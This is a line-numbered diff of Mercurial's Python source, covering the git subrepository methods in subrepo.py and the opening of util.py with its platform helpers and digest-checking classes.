1665 _sanitize(self.ui, self.wvfs, '.git')
1662 else:
1666 else:
1663 # a real merge would be required, just checkout the revision
1667 # a real merge would be required, just checkout the revision
1664 rawcheckout()
1668 rawcheckout()
1665
1669
1666 @annotatesubrepoerror
1670 @annotatesubrepoerror
1667 def commit(self, text, user, date):
1671 def commit(self, text, user, date):
1668 if self._gitmissing():
1672 if self._gitmissing():
1669 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1673 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1670 cmd = ['commit', '-a', '-m', text]
1674 cmd = ['commit', '-a', '-m', text]
1671 env = encoding.environ.copy()
1675 env = encoding.environ.copy()
1672 if user:
1676 if user:
1673 cmd += ['--author', user]
1677 cmd += ['--author', user]
1674 if date:
1678 if date:
1675 # git's date parser silently ignores when seconds < 1e9
1679 # git's date parser silently ignores when seconds < 1e9
1676 # convert to ISO8601
1680 # convert to ISO8601
1677 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1681 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1678 '%Y-%m-%dT%H:%M:%S %1%2')
1682 '%Y-%m-%dT%H:%M:%S %1%2')
1679 self._gitcommand(cmd, env=env)
1683 self._gitcommand(cmd, env=env)
1680 # make sure commit works otherwise HEAD might not exist under certain
1684 # make sure commit works otherwise HEAD might not exist under certain
1681 # circumstances
1685 # circumstances
1682 return self._gitstate()
1686 return self._gitstate()
1683
1687
1684 @annotatesubrepoerror
1688 @annotatesubrepoerror
1685 def merge(self, state):
1689 def merge(self, state):
1686 source, revision, kind = state
1690 source, revision, kind = state
1687 self._fetch(source, revision)
1691 self._fetch(source, revision)
1688 base = self._gitcommand(['merge-base', revision, self._state[1]])
1692 base = self._gitcommand(['merge-base', revision, self._state[1]])
1689 self._gitupdatestat()
1693 self._gitupdatestat()
1690 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1694 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1691
1695
1692 def mergefunc():
1696 def mergefunc():
1693 if base == revision:
1697 if base == revision:
1694 self.get(state) # fast forward merge
1698 self.get(state) # fast forward merge
1695 elif base != self._state[1]:
1699 elif base != self._state[1]:
1696 self._gitcommand(['merge', '--no-commit', revision])
1700 self._gitcommand(['merge', '--no-commit', revision])
1697 _sanitize(self.ui, self.wvfs, '.git')
1701 _sanitize(self.ui, self.wvfs, '.git')
1698
1702
1699 if self.dirty():
1703 if self.dirty():
1700 if self._gitstate() != revision:
1704 if self._gitstate() != revision:
1701 dirty = self._gitstate() == self._state[1] or code != 0
1705 dirty = self._gitstate() == self._state[1] or code != 0
1702 if _updateprompt(self.ui, self, dirty,
1706 if _updateprompt(self.ui, self, dirty,
1703 self._state[1][:7], revision[:7]):
1707 self._state[1][:7], revision[:7]):
1704 mergefunc()
1708 mergefunc()
1705 else:
1709 else:
1706 mergefunc()
1710 mergefunc()
1707
1711
1708 @annotatesubrepoerror
1712 @annotatesubrepoerror
1709 def push(self, opts):
1713 def push(self, opts):
1710 force = opts.get('force')
1714 force = opts.get('force')
1711
1715
1712 if not self._state[1]:
1716 if not self._state[1]:
1713 return True
1717 return True
1714 if self._gitmissing():
1718 if self._gitmissing():
1715 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1719 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1716 # if a branch in origin contains the revision, nothing to do
1720 # if a branch in origin contains the revision, nothing to do
1717 branch2rev, rev2branch = self._gitbranchmap()
1721 branch2rev, rev2branch = self._gitbranchmap()
1718 if self._state[1] in rev2branch:
1722 if self._state[1] in rev2branch:
1719 for b in rev2branch[self._state[1]]:
1723 for b in rev2branch[self._state[1]]:
1720 if b.startswith('refs/remotes/origin/'):
1724 if b.startswith('refs/remotes/origin/'):
1721 return True
1725 return True
1722 for b, revision in branch2rev.iteritems():
1726 for b, revision in branch2rev.iteritems():
1723 if b.startswith('refs/remotes/origin/'):
1727 if b.startswith('refs/remotes/origin/'):
1724 if self._gitisancestor(self._state[1], revision):
1728 if self._gitisancestor(self._state[1], revision):
1725 return True
1729 return True
1726 # otherwise, try to push the currently checked out branch
1730 # otherwise, try to push the currently checked out branch
1727 cmd = ['push']
1731 cmd = ['push']
1728 if force:
1732 if force:
1729 cmd.append('--force')
1733 cmd.append('--force')
1730
1734
1731 current = self._gitcurrentbranch()
1735 current = self._gitcurrentbranch()
1732 if current:
1736 if current:
1733 # determine if the current branch is even useful
1737 # determine if the current branch is even useful
1734 if not self._gitisancestor(self._state[1], current):
1738 if not self._gitisancestor(self._state[1], current):
1735 self.ui.warn(_('unrelated git branch checked out '
1739 self.ui.warn(_('unrelated git branch checked out '
1736 'in subrepository "%s"\n') % self._relpath)
1740 'in subrepository "%s"\n') % self._relpath)
1737 return False
1741 return False
1738 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1742 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1739 (current.split('/', 2)[2], self._relpath))
1743 (current.split('/', 2)[2], self._relpath))
1740 ret = self._gitdir(cmd + ['origin', current])
1744 ret = self._gitdir(cmd + ['origin', current])
1741 return ret[1] == 0
1745 return ret[1] == 0
1742 else:
1746 else:
1743 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1747 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1744 'cannot push revision %s\n') %
1748 'cannot push revision %s\n') %
1745 (self._relpath, self._state[1]))
1749 (self._relpath, self._state[1]))
1746 return False
1750 return False
1747
1751
1748 @annotatesubrepoerror
1752 @annotatesubrepoerror
1749 def add(self, ui, match, prefix, explicitonly, **opts):
1753 def add(self, ui, match, prefix, explicitonly, **opts):
1750 if self._gitmissing():
1754 if self._gitmissing():
1751 return []
1755 return []
1752
1756
1753 (modified, added, removed,
1757 (modified, added, removed,
1754 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1758 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1755 clean=True)
1759 clean=True)
1756
1760
1757 tracked = set()
1761 tracked = set()
1758 # dirstates 'amn' warn, 'r' is added again
1762 # dirstates 'amn' warn, 'r' is added again
1759 for l in (modified, added, deleted, clean):
1763 for l in (modified, added, deleted, clean):
1760 tracked.update(l)
1764 tracked.update(l)
1761
1765
1762 # Unknown files not of interest will be rejected by the matcher
1766 # Unknown files not of interest will be rejected by the matcher
1763 files = unknown
1767 files = unknown
1764 files.extend(match.files())
1768 files.extend(match.files())
1765
1769
1766 rejected = []
1770 rejected = []
1767
1771
1768 files = [f for f in sorted(set(files)) if match(f)]
1772 files = [f for f in sorted(set(files)) if match(f)]
1769 for f in files:
1773 for f in files:
1770 exact = match.exact(f)
1774 exact = match.exact(f)
1771 command = ["add"]
1775 command = ["add"]
1772 if exact:
1776 if exact:
1773 command.append("-f") #should be added, even if ignored
1777 command.append("-f") #should be added, even if ignored
1774 if ui.verbose or not exact:
1778 if ui.verbose or not exact:
1775 ui.status(_('adding %s\n') % match.rel(f))
1779 ui.status(_('adding %s\n') % match.rel(f))
1776
1780
1777 if f in tracked: # hg prints 'adding' even if already tracked
1781 if f in tracked: # hg prints 'adding' even if already tracked
1778 if exact:
1782 if exact:
1779 rejected.append(f)
1783 rejected.append(f)
1780 continue
1784 continue
1781 if not opts.get(r'dry_run'):
1785 if not opts.get(r'dry_run'):
1782 self._gitcommand(command + [f])
1786 self._gitcommand(command + [f])
1783
1787
1784 for f in rejected:
1788 for f in rejected:
1785 ui.warn(_("%s already tracked!\n") % match.abs(f))
1789 ui.warn(_("%s already tracked!\n") % match.abs(f))
1786
1790
1787 return rejected
1791 return rejected
1788
1792
1789 @annotatesubrepoerror
1793 @annotatesubrepoerror
1790 def remove(self):
1794 def remove(self):
1791 if self._gitmissing():
1795 if self._gitmissing():
1792 return
1796 return
1793 if self.dirty():
1797 if self.dirty():
1794 self.ui.warn(_('not removing repo %s because '
1798 self.ui.warn(_('not removing repo %s because '
1795 'it has changes.\n') % self._relpath)
1799 'it has changes.\n') % self._relpath)
1796 return
1800 return
1797 # we can't fully delete the repository as it may contain
1801 # we can't fully delete the repository as it may contain
1798 # local-only history
1802 # local-only history
1799 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1803 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1800 self._gitcommand(['config', 'core.bare', 'true'])
1804 self._gitcommand(['config', 'core.bare', 'true'])
1801 for f, kind in self.wvfs.readdir():
1805 for f, kind in self.wvfs.readdir():
1802 if f == '.git':
1806 if f == '.git':
1803 continue
1807 continue
1804 if kind == stat.S_IFDIR:
1808 if kind == stat.S_IFDIR:
1805 self.wvfs.rmtree(f)
1809 self.wvfs.rmtree(f)
1806 else:
1810 else:
1807 self.wvfs.unlink(f)
1811 self.wvfs.unlink(f)
1808
1812
1809 def archive(self, archiver, prefix, match=None, decode=True):
1813 def archive(self, archiver, prefix, match=None, decode=True):
1810 total = 0
1814 total = 0
1811 source, revision = self._state
1815 source, revision = self._state
1812 if not revision:
1816 if not revision:
1813 return total
1817 return total
1814 self._fetch(source, revision)
1818 self._fetch(source, revision)
1815
1819
1816 # Parse git's native archive command.
1820 # Parse git's native archive command.
1817 # This should be much faster than manually traversing the trees
1821 # This should be much faster than manually traversing the trees
1818 # and objects with many subprocess calls.
1822 # and objects with many subprocess calls.
1819 tarstream = self._gitcommand(['archive', revision], stream=True)
1823 tarstream = self._gitcommand(['archive', revision], stream=True)
1820 tar = tarfile.open(fileobj=tarstream, mode='r|')
1824 tar = tarfile.open(fileobj=tarstream, mode='r|')
1821 relpath = subrelpath(self)
1825 relpath = subrelpath(self)
1822 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1826 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1823 for i, info in enumerate(tar):
1827 for i, info in enumerate(tar):
1824 if info.isdir():
1828 if info.isdir():
1825 continue
1829 continue
1826 if match and not match(info.name):
1830 if match and not match(info.name):
1827 continue
1831 continue
1828 if info.issym():
1832 if info.issym():
1829 data = info.linkname
1833 data = info.linkname
1830 else:
1834 else:
1831 data = tar.extractfile(info).read()
1835 data = tar.extractfile(info).read()
1832 archiver.addfile(prefix + self._path + '/' + info.name,
1836 archiver.addfile(prefix + self._path + '/' + info.name,
1833 info.mode, info.issym(), data)
1837 info.mode, info.issym(), data)
1834 total += 1
1838 total += 1
1835 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1839 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1836 unit=_('files'))
1840 unit=_('files'))
1837 self.ui.progress(_('archiving (%s)') % relpath, None)
1841 self.ui.progress(_('archiving (%s)') % relpath, None)
1838 return total
1842 return total
1839
1843
1840
1844
1841 @annotatesubrepoerror
1845 @annotatesubrepoerror
1842 def cat(self, match, fm, fntemplate, prefix, **opts):
1846 def cat(self, match, fm, fntemplate, prefix, **opts):
1843 rev = self._state[1]
1847 rev = self._state[1]
1844 if match.anypats():
1848 if match.anypats():
1845 return 1 #No support for include/exclude yet
1849 return 1 #No support for include/exclude yet
1846
1850
1847 if not match.files():
1851 if not match.files():
1848 return 1
1852 return 1
1849
1853
1850 # TODO: add support for non-plain formatter (see cmdutil.cat())
1854 # TODO: add support for non-plain formatter (see cmdutil.cat())
1851 for f in match.files():
1855 for f in match.files():
1852 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1856 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1853 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1857 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1854 self._ctx.node(),
1858 self._ctx.node(),
1855 pathname=self.wvfs.reljoin(prefix, f))
1859 pathname=self.wvfs.reljoin(prefix, f))
1856 fp.write(output)
1860 fp.write(output)
1857 fp.close()
1861 fp.close()
1858 return 0
1862 return 0
1859
1863
1860
1864
1861 @annotatesubrepoerror
1865 @annotatesubrepoerror
1862 def status(self, rev2, **opts):
1866 def status(self, rev2, **opts):
1863 rev1 = self._state[1]
1867 rev1 = self._state[1]
1864 if self._gitmissing() or not rev1:
1868 if self._gitmissing() or not rev1:
1865 # if the repo is missing, return no results
1869 # if the repo is missing, return no results
1866 return scmutil.status([], [], [], [], [], [], [])
1870 return scmutil.status([], [], [], [], [], [], [])
1867 modified, added, removed = [], [], []
1871 modified, added, removed = [], [], []
1868 self._gitupdatestat()
1872 self._gitupdatestat()
1869 if rev2:
1873 if rev2:
1870 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1874 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1871 else:
1875 else:
1872 command = ['diff-index', '--no-renames', rev1]
1876 command = ['diff-index', '--no-renames', rev1]
1873 out = self._gitcommand(command)
1877 out = self._gitcommand(command)
1874 for line in out.split('\n'):
1878 for line in out.split('\n'):
1875 tab = line.find('\t')
1879 tab = line.find('\t')
1876 if tab == -1:
1880 if tab == -1:
1877 continue
1881 continue
1878 status, f = line[tab - 1], line[tab + 1:]
1882 status, f = line[tab - 1], line[tab + 1:]
1879 if status == 'M':
1883 if status == 'M':
1880 modified.append(f)
1884 modified.append(f)
1881 elif status == 'A':
1885 elif status == 'A':
1882 added.append(f)
1886 added.append(f)
1883 elif status == 'D':
1887 elif status == 'D':
1884 removed.append(f)
1888 removed.append(f)
1885
1889
1886 deleted, unknown, ignored, clean = [], [], [], []
1890 deleted, unknown, ignored, clean = [], [], [], []
1887
1891
1888 command = ['status', '--porcelain', '-z']
1892 command = ['status', '--porcelain', '-z']
1889 if opts.get(r'unknown'):
1893 if opts.get(r'unknown'):
1890 command += ['--untracked-files=all']
1894 command += ['--untracked-files=all']
1891 if opts.get(r'ignored'):
1895 if opts.get(r'ignored'):
1892 command += ['--ignored']
1896 command += ['--ignored']
1893 out = self._gitcommand(command)
1897 out = self._gitcommand(command)
1894
1898
1895 changedfiles = set()
1899 changedfiles = set()
1896 changedfiles.update(modified)
1900 changedfiles.update(modified)
1897 changedfiles.update(added)
1901 changedfiles.update(added)
1898 changedfiles.update(removed)
1902 changedfiles.update(removed)
1899 for line in out.split('\0'):
1903 for line in out.split('\0'):
1900 if not line:
1904 if not line:
1901 continue
1905 continue
1902 st = line[0:2]
1906 st = line[0:2]
1903 #moves and copies show 2 files on one line
1907 #moves and copies show 2 files on one line
1904 if line.find('\0') >= 0:
1908 if line.find('\0') >= 0:
1905 filename1, filename2 = line[3:].split('\0')
1909 filename1, filename2 = line[3:].split('\0')
1906 else:
1910 else:
1907 filename1 = line[3:]
1911 filename1 = line[3:]
1908 filename2 = None
1912 filename2 = None
1909
1913
1910 changedfiles.add(filename1)
1914 changedfiles.add(filename1)
1911 if filename2:
1915 if filename2:
1912 changedfiles.add(filename2)
1916 changedfiles.add(filename2)
1913
1917
1914 if st == '??':
1918 if st == '??':
1915 unknown.append(filename1)
1919 unknown.append(filename1)
1916 elif st == '!!':
1920 elif st == '!!':
1917 ignored.append(filename1)
1921 ignored.append(filename1)
1918
1922
1919 if opts.get(r'clean'):
1923 if opts.get(r'clean'):
1920 out = self._gitcommand(['ls-files'])
1924 out = self._gitcommand(['ls-files'])
1921 for f in out.split('\n'):
1925 for f in out.split('\n'):
1922 if not f in changedfiles:
1926 if not f in changedfiles:
1923 clean.append(f)
1927 clean.append(f)
1924
1928
1925 return scmutil.status(modified, added, removed, deleted,
1929 return scmutil.status(modified, added, removed, deleted,
1926 unknown, ignored, clean)
1930 unknown, ignored, clean)
1927
1931
1928 @annotatesubrepoerror
1932 @annotatesubrepoerror
1929 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1933 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1930 node1 = self._state[1]
1934 node1 = self._state[1]
1931 cmd = ['diff', '--no-renames']
1935 cmd = ['diff', '--no-renames']
1932 if opts[r'stat']:
1936 if opts[r'stat']:
1933 cmd.append('--stat')
1937 cmd.append('--stat')
1934 else:
1938 else:
1935 # for Git, this also implies '-p'
1939 # for Git, this also implies '-p'
1936 cmd.append('-U%d' % diffopts.context)
1940 cmd.append('-U%d' % diffopts.context)
1937
1941
1938 gitprefix = self.wvfs.reljoin(prefix, self._path)
1942 gitprefix = self.wvfs.reljoin(prefix, self._path)
1939
1943
1940 if diffopts.noprefix:
1944 if diffopts.noprefix:
1941 cmd.extend(['--src-prefix=%s/' % gitprefix,
1945 cmd.extend(['--src-prefix=%s/' % gitprefix,
1942 '--dst-prefix=%s/' % gitprefix])
1946 '--dst-prefix=%s/' % gitprefix])
1943 else:
1947 else:
1944 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1948 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1945 '--dst-prefix=b/%s/' % gitprefix])
1949 '--dst-prefix=b/%s/' % gitprefix])
1946
1950
1947 if diffopts.ignorews:
1951 if diffopts.ignorews:
1948 cmd.append('--ignore-all-space')
1952 cmd.append('--ignore-all-space')
1949 if diffopts.ignorewsamount:
1953 if diffopts.ignorewsamount:
1950 cmd.append('--ignore-space-change')
1954 cmd.append('--ignore-space-change')
1951 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1955 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1952 and diffopts.ignoreblanklines:
1956 and diffopts.ignoreblanklines:
1953 cmd.append('--ignore-blank-lines')
1957 cmd.append('--ignore-blank-lines')
1954
1958
1955 cmd.append(node1)
1959 cmd.append(node1)
1956 if node2:
1960 if node2:
1957 cmd.append(node2)
1961 cmd.append(node2)
1958
1962
1959 output = ""
1963 output = ""
1960 if match.always():
1964 if match.always():
1961 output += self._gitcommand(cmd) + '\n'
1965 output += self._gitcommand(cmd) + '\n'
1962 else:
1966 else:
1963 st = self.status(node2)[:3]
1967 st = self.status(node2)[:3]
1964 files = [f for sublist in st for f in sublist]
1968 files = [f for sublist in st for f in sublist]
1965 for f in files:
1969 for f in files:
1966 if match(f):
1970 if match(f):
1967 output += self._gitcommand(cmd + ['--', f]) + '\n'
1971 output += self._gitcommand(cmd + ['--', f]) + '\n'
1968
1972
1969 if output.strip():
1973 if output.strip():
1970 ui.write(output)
1974 ui.write(output)
1971
1975
1972 @annotatesubrepoerror
1976 @annotatesubrepoerror
1973 def revert(self, substate, *pats, **opts):
1977 def revert(self, substate, *pats, **opts):
1974 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1978 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1975 if not opts.get(r'no_backup'):
1979 if not opts.get(r'no_backup'):
1976 status = self.status(None)
1980 status = self.status(None)
1977 names = status.modified
1981 names = status.modified
1978 for name in names:
1982 for name in names:
1979 bakname = scmutil.origpath(self.ui, self._subparent, name)
1983 bakname = scmutil.origpath(self.ui, self._subparent, name)
1980 self.ui.note(_('saving current version of %s as %s\n') %
1984 self.ui.note(_('saving current version of %s as %s\n') %
1981 (name, bakname))
1985 (name, bakname))
1982 self.wvfs.rename(name, bakname)
1986 self.wvfs.rename(name, bakname)
1983
1987
1984 if not opts.get(r'dry_run'):
1988 if not opts.get(r'dry_run'):
1985 self.get(substate, overwrite=True)
1989 self.get(substate, overwrite=True)
1986 return []
1990 return []
1987
1991
1988 def shortid(self, revid):
1992 def shortid(self, revid):
1989 return revid[:7]
1993 return revid[:7]
1990
1994
1991 types = {
1995 types = {
1992 'hg': hgsubrepo,
1996 'hg': hgsubrepo,
1993 'svn': svnsubrepo,
1997 'svn': svnsubrepo,
1994 'git': gitsubrepo,
1998 'git': gitsubrepo,
1995 }
1999 }
@@ -1,3719 +1,3720 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import datetime
23 import datetime
24 import errno
24 import errno
25 import gc
25 import gc
26 import hashlib
26 import hashlib
27 import imp
27 import imp
28 import os
28 import os
29 import platform as pyplatform
29 import platform as pyplatform
30 import re as remod
30 import re as remod
31 import shutil
31 import shutil
32 import signal
32 import signal
33 import socket
33 import socket
34 import stat
34 import stat
35 import string
35 import string
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import textwrap
39 import textwrap
40 import time
40 import time
41 import traceback
41 import traceback
42 import warnings
42 import warnings
43 import zlib
43 import zlib
44
44
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 base85 = policy.importmod(r'base85')
53 base85 = policy.importmod(r'base85')
54 osutil = policy.importmod(r'osutil')
54 osutil = policy.importmod(r'osutil')
55 parsers = policy.importmod(r'parsers')
55 parsers = policy.importmod(r'parsers')
56
56
57 b85decode = base85.b85decode
57 b85decode = base85.b85decode
58 b85encode = base85.b85encode
58 b85encode = base85.b85encode
59
59
60 cookielib = pycompat.cookielib
60 cookielib = pycompat.cookielib
61 empty = pycompat.empty
61 empty = pycompat.empty
62 httplib = pycompat.httplib
62 httplib = pycompat.httplib
63 httpserver = pycompat.httpserver
63 httpserver = pycompat.httpserver
64 pickle = pycompat.pickle
64 pickle = pycompat.pickle
65 queue = pycompat.queue
65 queue = pycompat.queue
66 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
67 stderr = pycompat.stderr
67 stderr = pycompat.stderr
68 stdin = pycompat.stdin
68 stdin = pycompat.stdin
69 stdout = pycompat.stdout
69 stdout = pycompat.stdout
70 stringio = pycompat.stringio
70 stringio = pycompat.stringio
71 urlerr = pycompat.urlerr
71 urlerr = pycompat.urlerr
72 urlreq = pycompat.urlreq
72 urlreq = pycompat.urlreq
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 # workaround for win32mbcs
75 # workaround for win32mbcs
76 _filenamebytestr = pycompat.bytestr
76 _filenamebytestr = pycompat.bytestr
77
77
def isatty(fp):
    """Report whether *fp* is attached to a terminal.

    Objects without a working ``isatty`` method are treated as
    non-interactive.
    """
    try:
        interactive = fp.isatty()
    except AttributeError:
        return False
    return interactive
83
83
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    # reopen stdout line-buffered (bufsize=1) before anything is written
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

# select the OS-specific implementation module; everything below re-exports
# its members under stable util.<name> aliases so callers stay portable
if pycompat.osname == 'nt':
    from . import windows as platform
    # wrap stdout to work around Windows console write quirks
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
# prefer the C implementation when the compiled osutil provides it
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

# optional osutil features: only present when the C module was built with
# support for them, so tolerate their absence
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
161
161
# Python compatibility

# unique sentinel used to distinguish "attribute is absent" from
# "attribute is None" (see safehasattr below)
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)
170
170
def safehasattr(thing, attr):
    """hasattr() variant that does not swallow exceptions from properties.

    Only a genuinely missing attribute (getattr falling back to the
    sentinel default) yields False; any exception raised while computing
    the attribute propagates to the caller.
    """
    missing = object()
    return getattr(thing, attr, missing) is not missing
173
173
def bitsfrom(container):
    """OR together every integer flag in *container* into one bitmask.

    An empty container yields 0.
    """
    mask = 0
    for flag in container:
        mask |= flag
    return mask
179
179
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
# HGEMITWARNINGS is set by the test runner.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
194
194
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    # append the standard compatibility-window notice before emitting
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    warnings.warn(msg, DeprecationWarning, stacklevel + 1)
204
204
# registry of supported digest algorithms, keyed by their protocol name
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every ranked digest must actually be registered
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester(['md5', 'sha1'])
    >>> d.update('foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d['md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d['sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred(['md5', 'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create one hasher per name in ``digests``; optionally hash ``s``.

        Raises Abort for an unrecognized digest name.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every underlying hasher."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for ``key``.

        Raises Abort for an unrecognized digest name.
        """
        if key not in DIGESTS:
            # fix: the error message previously interpolated 'k' — a leftover
            # module-level loop variable — instead of the requested 'key'
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
262
262
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, updating digests and byte count."""
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        """Abort unless the observed byte count and every digest match."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
294
294
# py2 has a builtin buffer(); on py3 emulate it with zero-copy memoryview
# slices
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        # a memoryview slice behaves like py2's buffer() without copying
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

